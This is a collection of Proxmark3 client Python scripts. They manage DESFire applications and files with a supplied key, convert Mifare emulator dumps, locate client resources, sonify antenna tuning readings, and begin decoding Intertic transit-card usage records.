"""
DES Talk - A Proxmark3 DESFire Communication Tool

Copyright (C) 2025 Trigat

Description:
This script simplifies the creation and deletion of
DESFire applications and files. It supports USB, Bluetooth,
and Termux connections and has been tested on Android and Linux.

Note: Modify TCP_PORT below if using TCP app with Android or Termux

License: GNU General Public License v3.0

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

Full license text: <https://www.gnu.org/licenses/gpl-3.0.html>
"""


import subprocess
import time
import os
import re

try:
    import pm3  # Used when inside the pm3 environment
    PM3_AVAILABLE = True
    p = pm3.pm3()
except ImportError:
    PM3_AVAILABLE = False  # Use subprocess instead

# SPECIFY PORT IF USING TCP APP WITH ANDROID OR TERMUX
TCP_PORT = 4444

def detect_proxmark_device():

    # Detect the Proxmark3 connection type (USB, Bluetooth, or TCP).
    try:
        # Try running `pm3 --list` to detect available Proxmark devices
        result = subprocess.run(["pm3", "--list"], capture_output=True, text=True, check=True)
        lines = result.stdout.splitlines()

        for line in lines:
            if ":" in line:  # Expected format: "1: /dev/ttyACM0" or "1: bt:xx:xx:xx:xx:xx"
                device = line.split(": ", 1)[1].strip()
                print(f"✅ Using Proxmark device: {device}")
                return device
    except Exception:
        print("⚠️ `pm3 --list` failed, falling back to manual detection.")

    # If `pm3 --list` doesn't work, check manually (Android or fallback mode)
    usb_devices = ["/dev/ttyACM0", "/dev/ttyACM1", "/dev/ttyUSB0", "/dev/ttyUSB1"]
    for dev in usb_devices:
        if os.path.exists(dev):
            print(f"✅ Using USB device: {dev}")
            return dev

    # Default to TCP mode for Android Termux
    print(f"⚠️ No USB or Bluetooth device found, defaulting to TCP (localhost:{TCP_PORT})")
    return f"tcp:localhost:{TCP_PORT}"

def send_proxmark_command(command):

    if PM3_AVAILABLE:
        p.console(command)
        return p.grabbed_output.strip()

    else:
        full_command = f"{command}\n"
        host_device = detect_proxmark_device()

        process = subprocess.Popen(
            ["proxmark3", host_device],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True
        )

        output, error = process.communicate(full_command)

        time.sleep(0.2)  # Small delay to let Proxmark process fully

        # Combine stdout and stderr
        response_lines = (output or "").splitlines() + (error or "").splitlines()

        # Remove the harmless "STDIN unexpected end" message
        filtered_response = "\n".join(line for line in response_lines if "STDIN unexpected end" not in line)

        return filtered_response.strip()

def authenticate_and_menu():

    key_type = input("Enter key type (DES, 2TDEA, 3TDEA, AES): ").strip()
    key = input("Enter 8, 16, 24 or 32-byte hex key (no spaces): ").strip()

    # Authenticate
    auth_command = f"hf mfdes auth -t {key_type} -k {key}"
    auth_response = send_proxmark_command(auth_command)
    print(auth_response)

    # Check for Proxmark failure messages
    if "error" in auth_response.lower() or "must have" in auth_response.lower():
        print("❌ Authentication failed. Check your connection, key, and key type.")
        return

    while True:

        # Get AIDs
        aids_command = f"hf mfdes getaids -n 0 -t {key_type} -k {key}"
        aids_response = send_proxmark_command(aids_command)
        print(aids_response)

        # Regex to match valid 6-character hex AIDs
        hex_pattern = re.compile(r"\b[0-9A-Fa-f]{6}\b")

        aids = []
        for line in aids_response.split("\n"):
            if "PM3 UART serial baudrate" in line:
                continue
            match = hex_pattern.search(line)
            if match:
                aids.append(match.group(0))

        if aids:  # Check if there are any AIDs
            print("\nAvailable AIDs:")
            for i, aid in enumerate(aids):
                print(f"{i + 1}. {aid}")
        else:
            print("\n❌ No AID found on the card.")

        print("\nChoose an option:")
        print("1. Select an AID")
        print("2. Create a new AID")
        print("3. Delete an AID")
        print("4. Format PICC")
        print("5. Show free memory")
        print("6. Exit")

        choice = input("Enter your choice: ").strip()

        if choice == "1":
            selected_index = int(input("Select an available AID number (e.g., 1, 2, or 3): ")) - 1
            if selected_index < 0 or selected_index >= len(aids):
                print("\nInvalid selection.")
                continue

            selected_aid = aids[selected_index]
            print(f"\nSelecting AID: {selected_aid}")

            select_command = f"hf mfdes selectapp --aid {selected_aid} -t {key_type} -k {key}"
            select_response = send_proxmark_command(select_command)
            print(select_response)

            # Show file menu
            aid_file_menu(selected_aid, key_type, key)

        elif choice == "2":
            create_aid(key_type, key)

        elif choice == "3":
            delete_aid(key_type, key)

        elif choice == "4":
            format_picc(key_type, key)

        elif choice == "5":
            free_memory(key_type, key)

        elif choice == "6":
            print("Exiting...")
            break
        else:
            print("Invalid choice, please try again.")

def aid_file_menu(selected_aid, key_type, key):

    while True:
        print(f"\n[ AID {selected_aid} is open ]")
        print("\nChoose an operation:")
        print("1. List Files")
        print("2. Read a File")
        print("3. Create a File")
        print("4. Write to a File")
        print("5. Delete a File")
        print("6. Exit")

        choice = input("Enter your choice: ").strip()

        if choice == "1":
            list_files(selected_aid, key_type, key)
        elif choice == "2":
            read_file(selected_aid, key_type, key)
        elif choice == "3":
            create_file(selected_aid, key_type, key)
        elif choice == "4":
            write_to_file(selected_aid, key_type, key)
        elif choice == "5":
            delete_file(selected_aid, key_type, key)
        elif choice == "6":
            print("Returning to AID selection...")
            break
        else:
            print("Invalid choice, please try again.")

def create_aid(key_type, key):

    aid = input("Enter new AID (6 hex characters, e.g., 112233): ").strip()
    iso_fid = input("Enter ISO File ID (4 hex characters, e.g., 1234): ").strip()
    dstalgo = input("Enter encryption algorithm (DES, 2TDEA, 3TDEA, AES): ").strip().upper()

    create_command = f"hf mfdes createapp -n 0 --aid {aid} --fid {iso_fid} --dstalgo {dstalgo} -t {key_type} -k {key} -a"
    response = send_proxmark_command(create_command)
    print(response)

def delete_aid(key_type, key):

    aid = input("Enter AID to delete (6 hex characters): ").strip()
    delete_command = f"hf mfdes deleteapp --aid {aid} -n 0 -t {key_type} -k {key}"
    response = send_proxmark_command(delete_command)
    print(response)

def format_picc(key_type, key):

    confirm = input("Are you sure you want to format the PICC? This will erase all data. (y/n): ").strip().lower()

    if confirm == "y":
        format_command = f"hf mfdes formatpicc -t {key_type} -k {key} -v"
        response = send_proxmark_command(format_command)
        print(response)
    elif confirm == "n":
        print("Formatting cancelled.")
    else:
        print("Invalid input. Please enter 'y' or 'n'.")

def free_memory(key_type, key):

    memory_command = f"hf mfdes freemem -t {key_type} -k {key}"
    response = send_proxmark_command(memory_command)

    for line in response.splitlines():
        if "Free memory" in line:
            print(f"\n✅ {line}")
            return

    print("❌ Unable to retrieve free memory information.")

def list_files(aid, key_type, key):

    print("\nFetching file list...")
    command = f"hf mfdes getfileids --aid {aid} -t {key_type} -k {key}"
    response = send_proxmark_command(command)

    # Extract file IDs by looking for "File ID:" regex
    file_ids = []
    for line in response.splitlines():
        match = re.search(r"File ID:\s*([0-9A-Fa-f]{2})", line)
        if match:
            file_ids.append(match.group(1))

    if file_ids:
        print("\nAvailable File IDs:")
        for i, file_id in enumerate(file_ids, 1):
            print(f"{i}. {file_id}")
        return file_ids
    else:
        print("No files found in this AID.")
        return []

def read_file(aid, key_type, key):

    file_id = input("Enter file ID to read: ").strip()

    # Get offset and ensure it's a 3-byte hex value (default: 000000)
    offset_input = input("Enter offset (default 0): ").strip() or "0"
    offset_hex = format(int(offset_input), '06X')  # Convert to 3-byte hex

    # Get length and ensure it's a 3-byte hex value (default: 000000 for full read)
    length_input = input("Enter length to read (e.g., 16 for 16 bytes, 64 for 64 bytes, default full read): ").strip() or "0"
    length_hex = format(int(length_input), '06X')  # Convert to 3-byte hex

    read_command = f"hf mfdes read --aid {aid} --fid {file_id} -t {key_type} -k {key} --offset {offset_hex} --length {length_hex}"
    response = send_proxmark_command(read_command)

    # Extract and display file content
    print("\nFile Data:")
    for line in response.splitlines():
        if re.search(r"\| [0-9A-Fa-f]{2} .* \|", line):  # Matches data table format
            print(line)

    return response

def create_file(aid, key_type, key):

    # Prompt for file ID in hex format
    file_id = input("Enter file ID (2 hex characters, e.g., 01, 02): ").strip()
    # Prompt for file size in KB, allowing for decimal values like 0.2KB
    file_size_kb_input = input("Enter file size in KB (e.g., .2 for 0.2KB, 1 for 1KB, 4 for 4KB, 16 for 16KB): ").strip()
    # Prefixes "00" to file_id for ISO file ID
    iso_file_id = f"00{file_id}"

    try:
        # Convert the input to a float
        file_size_kb = float(file_size_kb_input)

        if file_size_kb <= 0:
            raise ValueError("File size must be greater than 0.")

        # Convert KB to bytes (1 KB = 1024 bytes)
        file_size_bytes = int(file_size_kb * 1024)

        if file_size_bytes < 3:
            print("⚠️ File size is too small. Setting to minimum size of 3 bytes.")
            file_size_bytes = 3

        # Convert bytes to hexadecimal
        file_size_hex = format(file_size_bytes, 'X').upper().zfill(6)

        print(f"File size in bytes: {file_size_bytes} bytes")
        print(f"File size in hex: {file_size_hex}")

    except ValueError as e:
        print(f"Invalid file size: {e}")
        return

    create_command = f"hf mfdes createfile --aid {aid} --fid {file_id} --isofid {iso_file_id} --size {file_size_hex} -t {key_type} -k {key}"
    response = send_proxmark_command(create_command)
    print(response)

def write_to_file(aid, key_type, key):

    file_id = input("Enter file ID to write to: ").strip()

    # Get file size
    file_size_command = f"hf mfdes getfilesettings --aid {aid} --fid {file_id} -t {key_type} -k {key}"
    response = send_proxmark_command(file_size_command)

    # Extract the file size from the response
    file_size_match = re.search(r"File size \(bytes\)... (\d+) / 0x([0-9A-Fa-f]+)", response)
    if not file_size_match:
        print("❌ Unable to determine file size.")
        return

    file_size = int(file_size_match.group(1))  # Decimal file size

    print(f"✅ File size detected: {file_size} bytes")

    # Prompt user for data format choice (plain text or hex)
    while True:
        data_format = input("Enter data format (Type 1 for plain text, 2 for hex): ").strip()

        if data_format == "1":
            # Text input (no hex)
            write_data = input(f"Enter text to write (up to {file_size} bytes, no need for hex): ").strip()
            write_data_hex = write_data.encode().hex().upper()  # Convert to hex
            break

        elif data_format == "2":
            # Hex input
            write_data_hex = input(f"Enter hex data to write (up to {file_size * 2} hex chars): ").strip()
            if len(write_data_hex) % 2 != 0:  # Ensure it's a valid hex string
                print("❌ Invalid hex input. Please enter an even number of characters.")
            elif len(write_data_hex) // 2 > file_size:
                print(f"❌ Data exceeds file size limit of {file_size} bytes. Try again.")
            else:
                break
        else:
            print("❌ Invalid choice. Please choose 1 for text or 2 for hex.")

    write_command = f"hf mfdes write --aid {aid} --fid {file_id} -t {key_type} -k {key} -d {write_data_hex}"
    response = send_proxmark_command(write_command)
    print(response)

def delete_file(aid, key_type, key):

    file_id = input("Enter file ID to delete: ").strip()

    delete_command = f"hf mfdes deletefile --aid {aid} --fid {file_id} -t {key_type} -k {key}"
    response = send_proxmark_command(delete_command)
    print(response)

if __name__ == "__main__":
    authenticate_and_menu()



#!/usr/bin/env python3

'''
# Andrei Costin <zveriu@gmail.com>, 2011
# pm3_eml2mfd.py
# Converts PM3 Mifare Classic emulator EML text file to MFD binary dump file
'''


import sys
import binascii

def main(argv):
    argc = len(argv)
    if argc < 3:
        print('Usage:', argv[0], 'input.eml output.mfd')
        sys.exit(1)

    with open(argv[1], "r") as file_inp, open(argv[2], "wb") as file_out:
        for line in file_inp:
            line = line.rstrip('\n').rstrip('\r')
            print(line)
            data = binascii.unhexlify(line)
            file_out.write(data)

if __name__ == '__main__':
    main(sys.argv)



"""
Helper library to locate resources for pm3 scripts.

This module provides functionality to locate tools and dictionaries required
for pm3 scripts. It determines the paths based on the directory structure
and whether the script is being run in a development setup or an installed setup.

Functions:
    find_tool(tool_name):
        Finds the specified tool in the tools directory.
        Args:
            tool_name (str): The name of the tool to find.
        Returns:
            str: The full path to the tool if found, otherwise None.

    find_dict(dict_name):
        Find the specified dictionary in the dicts directory.
        Args:
            dict_name (str): The name of the dict to find.
        Returns:
            str: The full path to the dict if found, otherwise None.
"""

import os

# Install script can hardcode paths in the following variables
TOOLS_PATH="/build/proxmark3/pkg/proxmark3/usr/bin"
DICTS_PATH="/build/proxmark3/pkg/proxmark3/usr/share/proxmark3/dictionaries"

if __name__ == "__main__":
    print("This is a library, don't use it as a script")
    exit()

DIR_PATH = os.path.dirname(os.path.abspath(__file__))

if TOOLS_PATH is None:
    if os.path.basename(os.path.dirname(DIR_PATH)) == 'client':
        # dev setup
        DEV_TOOLS_PATH = os.path.normpath(os.path.join(DIR_PATH, "..", "..", "tools", "mfc", "card_only"))
        if os.path.isdir(DEV_TOOLS_PATH):
            TOOLS_PATH = DEV_TOOLS_PATH

if TOOLS_PATH is None:
    # assuming installed without having defined TOOLS_PATH
    TEST_TOOLS_PATH = os.path.normpath(os.path.join(DIR_PATH, "..", "tools"))
    if os.path.isdir(TEST_TOOLS_PATH):
        TOOLS_PATH = TEST_TOOLS_PATH


if DICTS_PATH is None:
    DEV_DICTS_PATH = os.path.normpath(os.path.join(DIR_PATH, "..", "dictionaries"))
    if os.path.isdir(DEV_DICTS_PATH):
        DICTS_PATH = DEV_DICTS_PATH


def find_tool(tool_name):
    """Find the specified tool in the tools directory.

    Args:
        tool_name (str): The name of the tool to find.
    Returns:
        str: The full path to the tool if found, otherwise None.
    """
    if TOOLS_PATH is not None:
        tool = os.path.join(TOOLS_PATH, tool_name)
        if os.path.isfile(tool):
            return tool
        elif os.path.isfile(tool + ".exe"):
            return tool + ".exe"
    # if not found, search in the user PATH
    for path in os.environ["PATH"].split(os.pathsep):
        env_tool = os.path.join(path, tool_name)
        if os.path.isfile(env_tool):
            return env_tool
        elif os.path.isfile(env_tool + ".exe"):
            return env_tool + ".exe"
    raise FileNotFoundError(f"Cannot find {tool_name}, abort!")


def find_dict(dict_name):
    """Find the specified dictionary in the dicts directory.

    Args:
        dict_name (str): The name of the dict to find.
    Returns:
        str: The full path to the dict if found, otherwise None.
    """
    if DICTS_PATH is not None:
        dictionary = os.path.join(DICTS_PATH, dict_name)
        if os.path.isfile(dictionary):
            return dictionary
    raise FileNotFoundError(f"Cannot find {dict_name}, abort!")



#!/usr/bin/python3

import os
import subprocess
import signal
import numpy as np
from pyaudio import PyAudio, paFloat32, paContinue

# Sound output parameters
volume = 1.0
sampling_freq = 44100  # Hz

# Frequency generator parameters
min_freq = 100   # Hz
max_freq = 6000  # Hz

# Proxmark3 parameters
pm3_client = "pm3"
pm3_tune_cmd = "hf tune --value"

frequency = 440
buffer = []


def find_zero_crossing_index(array):
    for i in range(1, len(array)):
        if array[i-1] < 0 and array[i] >= 0:
            return i
    return None  # Return None if no zero-crossing is found


def generate_sine_wave(frequency, sample_rate, duration, frame_count):
    """Generate a sine wave at a given frequency."""
    t = np.linspace(0, duration, int(sample_rate * duration), endpoint=False)
    wave = np.sin(2 * np.pi * frequency * t)
    return wave[:frame_count]


# PyAudio Callback function
def pyaudio_callback(in_data, frame_count, time_info, status):
    # if in_data is None:
    #     return (in_data, pyaudio.paContinue)
    global frequency
    global buffer
    wave = generate_sine_wave(frequency, sampling_freq, 0.01, frame_count*2)
    i = find_zero_crossing_index(buffer)
    if i is None:
        buffer = wave
    else:
        buffer = np.concatenate((buffer[:i], wave))
    data = (buffer[:frame_count] * volume).astype(np.float32).tobytes()
    buffer = buffer[frame_count:]
    return (data, paContinue)
# pyaudio.paComplete


def silent_pyaudio():
    """
    Lifted and adapted from https://stackoverflow.com/questions/67765911/
    PyAudio is noisy af every time you initialise it, which makes reading the
    log output rather difficult.  The output appears to be being made by the
    C internals, so we can't even redirect the logs with Python's logging
    facility.  Therefore the nuclear option was selected: swallow all stderr
    and stdout for the duration of PyAudio's use.
    """

    # Open a pair of null files
    null_fds = [os.open(os.devnull, os.O_RDWR) for x in range(2)]
    # Save the actual stdout (1) and stderr (2) file descriptors.
    save_fds = [os.dup(1), os.dup(2)]
    # Assign the null pointers to stdout and stderr.
    os.dup2(null_fds[0], 1)
    os.dup2(null_fds[1], 2)
    pyaudio = PyAudio()
    os.dup2(save_fds[0], 1)
    os.dup2(save_fds[1], 2)
    # Close all file descriptors
    for fd in null_fds + save_fds:
        os.close(fd)
    return pyaudio


def run_pm3_cmd(callback):
    # Start the process
    process = subprocess.Popen(
        [pm3_client, '-c', pm3_tune_cmd],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True,
        bufsize=1,  # Line buffered
        shell=False
    )

    # Read the output line by line as it comes
    try:
        with process.stdout as pipe:
            for line in pipe:
                # Process each line
                l = line.strip()  # Strip to remove any extraneous newline characters
                callback(l)
    except Exception as e:
        print(f"An error occurred: {e}")
    finally:
        # Ensure the subprocess is properly terminated
        process.terminate()
        process.wait()


def linear_to_exponential_freq(v, min_v, max_v, min_freq, max_freq):
    # First, map v to a range between 0 and 1
    if max_v != min_v:
        normalized_v = (v - min_v) / (max_v - min_v)
    else:
        normalized_v = 0.5
    normalized_v = 1 - normalized_v

    # Calculate the ratio of the max frequency to the min frequency
    freq_ratio = max_freq / min_freq

    # Calculate the exponential frequency using the mapped v
    freq = min_freq * (freq_ratio ** normalized_v)
    return freq


class foo():
    def __init__(self):
        self.p = silent_pyaudio()
        # For paFloat32 sample values must be in range [-1.0, 1.0]
        self.stream = self.p.open(format=paFloat32,
                             channels=1,
                             rate=sampling_freq,
                             output=True,
                             stream_callback=pyaudio_callback)

        # Initial voltage to frequency values
        self.min_v = 50000.0
        self.max_v = 0.0

        # Setting the signal handler for SIGINT (Ctrl+C)
        signal.signal(signal.SIGINT, self.signal_handler)

        # Start the stream
        self.stream.start_stream()

    def __exit__(self):
        self.stream.stop_stream()
        self.stream.close()
        self.p.terminate()

    def signal_handler(self, sig, frame):
        print("\nYou pressed Ctrl+C! Press Enter")
        self.__exit__()

    def callback(self, line):
        if 'mV' not in line:
            return
        v = int(line.split(' ')[1])
        if v == 0:
            return
        self.min_v = min(self.min_v, v)
        self.max_v = max(self.max_v, v)

        # Recalculate the audio frequency to generate
        global frequency
        frequency = linear_to_exponential_freq(v, self.min_v, self.max_v, min_freq, max_freq)

#        frequency = max_freq - ((max_freq - min_freq) * (v - self.min_v) / (self.max_v - self.min_v) + min_freq)
        #frequency = (frequency + new_frequency)/2


def main():
    f = foo()
    run_pm3_cmd(f.callback)


if __name__ == "__main__":
    main()



#   Benjamin DELPY `gentilkiwi`
#   https://blog.gentilkiwi.com/
#   benjamin@gentilkiwi.com
#
#   Basic script to try to interpret Intertic data on ST25TB / SRT512 in french transports
#   For Proxmark3 with love <3
#
#   This program is free software: you can redistribute it and/or modify
#   it under the terms of the GNU General Public License as published by
#   the Free Software Foundation, either version 3 of the License, or
#   (at your option) any later version.
#
#   This program is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#   GNU General Public License for more details.
#
#   See LICENSE.txt for the text of the license.

import sys, os
from datetime import datetime, timedelta
from bitarray import bitarray
from bitarray.util import ba2int
from typing import NamedTuple

class BitMe:
    def __init__(self):
        self.data = bitarray(endian = 'big')
        self.idx = 0

    def reset(self):
        self.idx = 0

    def addBits(self, bits):
        self.data += bits

    def addBytes(self, bytes):
        self.data.frombytes(bytes)

    def nom_bits(self, cb):
        ret = self.data[self.idx:self.idx + cb]
        self.idx += cb
        return ret

    def nom(self, cb):
        return ba2int(self.nom_bits(cb))

    def nom_bits_left(self):
        return self.data[self.idx:None]

    def isEmpty(self):
        return (len(self.data) == 0)

'''
A generic Describe_Usage function with variable number of bits between stamps will be more optimal
At this time I want to keep more places/functions to try to parse other fields in 'unk1' and 'left'
'''

TYPE_EventCode_Nature = {
    0x1: 'urban bus',
    0x2: 'interurban bus',
    0x3: 'metro',
    0x4: 'tramway',
    0x5: 'train',
    0x8: 'parking',
}

TYPE_EventCode_Type = {
    0x1: 'entry validation',
    0x2: 'exit validation',
    0x4: 'ticket inspecting',
    0x6: 'connection entry validation',
    0x14: 'test validation',
    0x15: 'connection exit validation',
    0x16: 'canceled validation',
    0x17: 'invalidation',
    0x18: 'distribution',
}

TYPE_EventGeoRoute_Direction = {
    0: 'undefined',
    1: 'outward',
    2: 'inward',
    3: 'circular',
}

def Describe_Usage_1(Usage, ContractMediumEndDate, Certificate):
    EventDateStamp = Usage.nom(10)
    EventTimeStamp = Usage.nom(11)
    unk = Usage.nom_bits(65)
    EventValidityTimeFirstStamp = Usage.nom(11)

    print('  EventDateStamp             : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d')))
    print('  EventTimeStamp             : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60))
    print('  unk1...                    :', unk)
    print('  EventValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60))
    print('  left...                    :', Usage.nom_bits_left())
    print('  [CER] Usage                : {:04x}'.format(Certificate.nom(16)))

def Describe_Usage_1_1(Usage, ContractMediumEndDate, Certificate):
    EventDateStamp = Usage.nom(10)
    EventTimeStamp = Usage.nom(11)
    unk0 = Usage.nom_bits(8)
    EventCode_Nature  = Usage.nom(5)
    EventCode_Type  = Usage.nom(5)
    unk1 = Usage.nom_bits(11)
    EventGeoVehicleId = Usage.nom(16)
    EventGeoRouteId = Usage.nom(14)
    EventGeoRoute_Direction = Usage.nom(2)
    EventCountPassengers_mb = Usage.nom(4)
    EventValidityTimeFirstStamp = Usage.nom(11)

    print('  DateStamp             : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d')))
    print('  TimeStamp             : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60))
    print('  unk0...               :', unk0)
    print('  Code/Nature           : 0x{:x} ({})'.format(EventCode_Nature, TYPE_EventCode_Nature.get(EventCode_Nature, '?')))
    print('  Code/Type             : 0x{:x} ({})'.format(EventCode_Type, TYPE_EventCode_Type.get(EventCode_Type, '?')))
    print('  unk1...               :', unk1)
    print('  GeoVehicleId          : {}'. format(EventGeoVehicleId))
    print('  GeoRouteId            : {}'. format(EventGeoRouteId))
    print('  Direction             : {} ({})'. format(EventGeoRoute_Direction, TYPE_EventGeoRoute_Direction.get(EventGeoRoute_Direction, '?')))
    print('  Passengers(?)         : {}'. format(EventCountPassengers_mb))
    print('  ValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60))
    print('  left...               :', Usage.nom_bits_left())
    print('  [CER] Usage           : {:04x}'.format(Certificate.nom(16)))

def Describe_Usage_1_2(Usage, ContractMediumEndDate, Certificate):
    EventDateStamp = Usage.nom(10)
    EventTimeStamp = Usage.nom(11)
    EventCount_mb = Usage.nom(6)
    unk0 = Usage.nom_bits(4)
    EventCode_Nature_mb  = Usage.nom(4)
    EventCode_Type_mb  = Usage.nom(4)
    unk1 = Usage.nom_bits(11)
    EventGeoVehicleId = Usage.nom(16)
    EventGeoRouteId = Usage.nom(14)
    EventGeoRoute_Direction = Usage.nom(2)
    EventCountPassengers_mb = Usage.nom(4)
    EventValidityTimeFirstStamp = Usage.nom(11)

    TYPE_EventCode_Nature_Reims = { # usually it's the opposite, but ... ?
        0x4: 'urban bus',
        0x1: 'tramway',
    }

    print('  DateStamp             : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d')))
    print('  TimeStamp             : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60))
    print('  Count(?)              : {}'. format(EventCount_mb))
    print('  unk0...               :', unk0)
    print('  Code/Nature(?)        : 0x{:x} ({})'.format(EventCode_Nature_mb, TYPE_EventCode_Nature_Reims.get(EventCode_Nature_mb, '?')))
    print('  Code/Type(?)          : 0x{:x} ({})'.format(EventCode_Type_mb, TYPE_EventCode_Type.get(EventCode_Type_mb, '?')))
    print('  unk1...               :', unk1)
    print('  GeoVehicleId          : {}'. format(EventGeoVehicleId))
    print('  GeoRouteId            : {}'. format(EventGeoRouteId))
    print('  Direction             : {} ({})'. format(EventGeoRoute_Direction, TYPE_EventGeoRoute_Direction.get(EventGeoRoute_Direction, '?')))
    print('  Passengers(?)         : {}'. format(EventCountPassengers_mb))
    print('  ValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60))
    print('  left...               :', Usage.nom_bits_left())
    print('  [CER] Usage           : {:04x}'.format(Certificate.nom(16)))

def Describe_Usage_2(Usage, ContractMediumEndDate, Certificate):
    EventDateStamp = Usage.nom(10)
    EventTimeStamp = Usage.nom(11)
    unk0 = Usage.nom_bits(8)
    EventCode_Nature  = Usage.nom(5)
    EventCode_Type  = Usage.nom(5)
    unk1 = Usage.nom_bits(11)
    EventGeoRouteId = Usage.nom(14)
    EventGeoRoute_Direction = Usage.nom(2)
    EventCountPassengers_mb = Usage.nom(4)
    EventValidityTimeFirstStamp = Usage.nom(11)

    print('  DateStamp             : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d')))
    print('  TimeStamp             : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60))
    print('  unk0...               :', unk0)
    print('  Code/Nature           : 0x{:x} ({})'.format(EventCode_Nature, TYPE_EventCode_Nature.get(EventCode_Nature, '?')))
    print('  Code/Type             : 0x{:x} ({})'.format(EventCode_Type, TYPE_EventCode_Type.get(EventCode_Type, '?')))
    print('  unk1...               :', unk1)
    print('  GeoRouteId            : {}'. format(EventGeoRouteId))
    print('  Direction             : {} ({})'. format(EventGeoRoute_Direction, TYPE_EventGeoRoute_Direction.get(EventGeoRoute_Direction, '?')))
    print('  Passengers(?)         : {}'. format(EventCountPassengers_mb))
    print('  ValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60))
    print('  left...               :', Usage.nom_bits_left())
    print('  [CER] Usage           : {:04x}'.format(Certificate.nom(16)))

def Describe_Usage_2_1(Usage, ContractMediumEndDate, Certificate):
    EventDateStamp = Usage.nom(10)
    EventTimeStamp = Usage.nom(11)
    unk0 = Usage.nom_bits(8)
    EventCode_Nature  = Usage.nom(5)
    EventCode_Type  = Usage.nom(5)
    unk = Usage.nom_bits(19)
    EventGeoRouteId = Usage.nom(14)
    EventGeoRoute_Direction = Usage.nom(2)
    EventGeoVehicleId = Usage.nom(16)
    EventCountPassengers_mb = Usage.nom(4)

    EventValidityTimeFirstStamp = Usage.nom(11)

    print('  EventDateStamp        : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d')))
    print('  EventTimeStamp        : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60))
    print('  unk0...               :', unk0)
    print('  Code/Nature           : 0x{:x} ({})'.format(EventCode_Nature, TYPE_EventCode_Nature.get(EventCode_Nature, '?')))
    print('  Code/Type             : 0x{:x} ({})'.format(EventCode_Type, TYPE_EventCode_Type.get(EventCode_Type, '?')))
    print('  unk1...               :', unk)
    print('  GeoRouteId            : {}'. format(EventGeoRouteId))
    print('  Direction             : {} ({})'. format(EventGeoRoute_Direction, TYPE_EventGeoRoute_Direction.get(EventGeoRoute_Direction, '?')))
    print('  GeoVehicleId          : {}'. format(EventGeoVehicleId))
    print('  Passengers(?)         : {}'. format(EventCountPassengers_mb))
    print('  ValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60))
    print('  left...               :', Usage.nom_bits_left())
    print('  [CER] Usage           : {:04x}'.format(Certificate.nom(16)))

def Describe_Usage_3(Usage, ContractMediumEndDate, Certificate):
    EventDateStamp = Usage.nom(10)
    EventTimeStamp = Usage.nom(11)
    unk = Usage.nom_bits(27)
    EventValidityTimeFirstStamp = Usage.nom(11)

    print('  EventDateStamp             : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d')))
    print('  EventTimeStamp             : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60))
    print('  unk1...                    :', unk)
    print('  EventValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60))
    print('  left...                    :', Usage.nom_bits_left())
    print('  [CER] Usage                : {:04x}'.format(Certificate.nom(16)))

def Describe_Usage_4(Usage, ContractMediumEndDate, Certificate):
    EventDateStamp = Usage.nom(10)
    EventTimeStamp = Usage.nom(11)
    unk = Usage.nom_bits(63)
    EventValidityTimeFirstStamp = Usage.nom(11)

    print('  EventDateStamp             : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d')))
    print('  EventTimeStamp             : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60))
    print('  unk1...                    :', unk)
    print('  EventValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60))
    print('  left...                    :', Usage.nom_bits_left())
    print('  [CER] Usage                : {:04x}'.format(Certificate.nom(16)))

